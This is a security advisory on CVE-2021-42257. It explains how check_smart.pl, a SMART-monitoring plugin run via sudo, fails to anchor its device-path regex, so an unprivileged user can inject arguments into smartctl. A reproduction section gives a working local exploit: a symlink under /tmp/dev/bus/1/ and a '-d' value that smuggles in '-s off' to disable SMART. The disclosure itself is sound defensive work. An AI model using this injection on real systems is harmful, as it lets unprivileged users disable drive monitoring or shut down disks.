check_smart.pl: unprivileged user can alter hard drive settings (CVE-2021-42257)
#CVE #local #sudoTable of Contents
Introduction
check_smart.pl is a plugin to monitor the values of
SMART attributes of hard disk and solid state drives, based on smartmontools.
It is intended for integration with systems monitoring software, e.g. Nagios,
Icinga, Shinken or Naemon.
During a routine audit of custom scripts in openSUSE, a
vulnerability was discovered: check_smart.pl
from version 6.1 through 6.9 insufficiently validated its input, allowing any
unprivileged local user to modify SMART settings, disable SMART monitoring
entirely, shut down a drive or degrade a drive’s performance by disabling its
read cache. The bug was fixed with the release of version 6.9.1.
Details
check_smart.pl needs to run as root in order to execute smartctl.
This is achieved with an entry in /etc/sudoers, which allows a lesser
privileged user, e.g. the one the monitoring system runs under, to
execute it. User input that is passed to smartctl is sufficiently
validated apart from one minor oversight.
The -d parameter is validated as follows:
if (-b $opt_dl || -c $opt_dl || $opt_dl =~ m/\/dev\/bus\/\d/) {
# OK
} else {
# NOT OK
}
Later on, this parameter is passed verbatim to smartctl:
my $full_command = "$smart_command -d $interface -Hi $device"
In short, the script will accept:
- block special devices
- char special devices
- any path matching the regex
/dev/bus/\d
Critically, this regex matches even when /dev/bus/\d is just a substring of
any arbitrary directory, for example /tmp/dev/bus/1/sda.
This can be exploited to pass arbitrary parameters to smartctl.
Steps to reproduce
su -l -s /bin/bash nagios
mkdir -p /tmp/dev/bus/1/
ln -s /dev/sda /tmp/dev/bus/1/
ls -l /tmp/dev/bus/1/sda
/usr/lib/nagios/plugins/check_smart --debug -i auto -d "/tmp/dev/bus/1/sda -s off"
SMART Disabled.
Upstream bugfix
Upstream (Claudio Kuenzler) was very responsive and quickly released version 6.9.1 to fix the issue.